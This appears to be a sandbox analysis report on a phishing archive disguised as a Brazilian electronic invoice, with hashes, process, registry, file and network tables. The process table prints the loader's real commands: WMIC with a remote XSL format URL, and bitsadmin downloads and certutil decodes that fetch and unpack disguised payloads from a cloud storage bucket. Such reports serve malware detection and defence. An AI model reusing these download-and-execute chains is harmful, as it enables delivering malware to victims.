| File name: | Nota_Fiscal_Eletronica.pdf.zip |
| Full analysis: | https://app.any.run/tasks/ce4a87a2-804d-4f1d-ba52-e77edc0688df |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | May 15, 2019, 00:57:10 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/octet-stream |
| File info: | data |
| MD5: | 6E7447E28D1F60601379866A730D11AF |
| SHA1: | A77A15581B6E0B3766F1B7026938492559328C87 |
| SHA256: | 8EEE6C258FC47B5C049E6D891FABBD70E1D940A89F3DE2EF0D2D4463E486D9F3 |
| SSDEEP: | 24:mBDHXCWeTWA8FOwho8OeXQnsyuZ3DbmGtR5FOvj1oZ80XlCnXCwAX:6DHKyFOH8dXDjDbmGUm3knnA |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 280 | C:\\Windows\\system32\\wbem\\WMIC.exe os get 98dWFHJnc, ek8ddUI, freephysicalmemory /format:"https://storage.googleapis.com/ultramaker/08/v.txt#025018ef7hil69I" | C:\Windows\system32\wbem\WMIC.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 2147749911 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 552 | C:\Windows\system32\cmd.exe /S /D /c" echo %x:57hil39=%" | C:\Windows\system32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1064 | "C:\Windows\System32\cmd.exe" /V /K "echo 139_TESLA_>C:\Users\Public\Libraries\temporary\r1.log"&& exit | C:\Windows\System32\cmd.exe | — | WMIC.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1232 | "C:\Windows\System32\certutil.exe" -decode C:\Users\Public\Libraries\temporary\falxconxrenwa.jpg.z C:\Users\Public\Libraries\temporary\falxconxrenwa.jpg | C:\Windows\System32\certutil.exe | — | WMIC.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 0 Version: 6.1.7601.18151 (win7sp1_gdr.130512-1533) Modules
| |||||||||||||||
| 1236 | "C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground https://storage.googleapis.com/ultramaker/x/08/falxconxrenw989.dll.zip.log?157102956 C:\Users\Public\Libraries\temporary\falxconxrenw98.~.z | C:\Windows\System32\bitsadmin.exe | — | WMIC.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: BITS administration utility Exit code: 0 Version: 7.5.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1444 | "C:\Windows\System32\cmd.exe" | C:\Windows\System32\cmd.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1624 | "C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground https://storage.googleapis.com/ultramaker/x/08/falxconxrenwc.jpg.zip.log?22065632 C:\Users\Public\Libraries\temporary\falxconxrenwc.jpg.z | C:\Windows\System32\bitsadmin.exe | — | WMIC.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: BITS administration utility Exit code: 0 Version: 7.5.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1752 | "C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground https://storage.googleapis.com/ultramaker/x/08/falxconxrenwdx.gif.zip.log?468650358 C:\Users\Public\Libraries\temporary\falxconxrenwdx.gif.z | C:\Windows\System32\bitsadmin.exe | — | WMIC.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: BITS administration utility Exit code: 0 Version: 7.5.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1776 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1844 | "C:\Windows\System32\cmd.exe" /k echo %time% && timeout 4000 > NUL && exit | C:\Windows\System32\cmd.exe | — | WMIC.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| (PID) Process: | (2940) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtBMP |
Value: | |||
| (PID) Process: | (2940) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtIcon |
Value: | |||
| (PID) Process: | (2940) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (2940) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\Desktop\Nota_Fiscal_Eletronica.pdf.zip | |||
| (PID) Process: | (2940) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (2940) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (2940) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
| (PID) Process: | (2940) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | mtime |
Value: 100 | |||
| (PID) Process: | (2940) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (2940) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2940 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa2940.35748\Nota_Fiscal_Eletronica.pdf.lnk | lnk | |
MD5:— | SHA256:— | |||
| 280 | WMIC.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\v[1].txt | xml | |
MD5:— | SHA256:— | |||
| 2620 | WMIC.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2U1WPAC\vv[1].txt | xml | |
MD5:— | SHA256:— | |||
| 1232 | certutil.exe | C:\Users\Public\Libraries\temporary\falxconxrenwa.jpg | binary | |
MD5:— | SHA256:— | |||
| 2832 | certutil.exe | C:\Users\Public\Libraries\temporary\falxconxrenwdwwn.gif | binary | |
MD5:— | SHA256:— | |||
| 2972 | certutil.exe | C:\Users\Public\Libraries\temporary\falxconxrenwdx.gif | binary | |
MD5:— | SHA256:— | |||
| 2444 | certutil.exe | C:\Users\Public\Libraries\temporary\falxconxrenwb.jpg | binary | |
MD5:— | SHA256:— | |||
| 2232 | certutil.exe | C:\Users\Public\Libraries\temporary\falxconxrenwxa.~ | executable | |
MD5:— | SHA256:— | |||
| 2116 | certutil.exe | C:\Users\Public\Libraries\temporary\falxconxrenwgx.gif | binary | |
MD5:— | SHA256:— | |||
| 2832 | certutil.exe | C:\Users\Public\Libraries\temporary\falxconxrenwc.jpg | binary | |
MD5:— | SHA256:— | |||
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
280 | WMIC.exe | 172.217.28.16:443 | storage.googleapis.com | Google Inc. | US | unknown |
2620 | WMIC.exe | 172.217.28.16:443 | storage.googleapis.com | Google Inc. | US | unknown |
— | — | 172.217.28.16:443 | storage.googleapis.com | Google Inc. | US | unknown |
Domain | IP | Reputation |
|---|---|---|
storage.googleapis.com |
| whitelisted |